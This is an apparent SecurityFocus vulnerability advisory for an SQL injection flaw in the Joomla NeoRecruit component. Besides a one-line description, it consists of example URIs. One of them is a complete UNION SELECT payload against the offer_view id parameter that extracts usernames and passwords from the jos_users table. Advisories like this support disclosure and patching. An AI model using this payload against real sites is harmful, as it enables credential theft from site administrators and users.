Joomla NeoRecruit Component SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/[path]//index.php?option=com_neorecruit&task=offer_view&id=[SQL Inject]

http://www.example.com/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*


 

Privacy Statement
Copyright 2010, SecurityFocus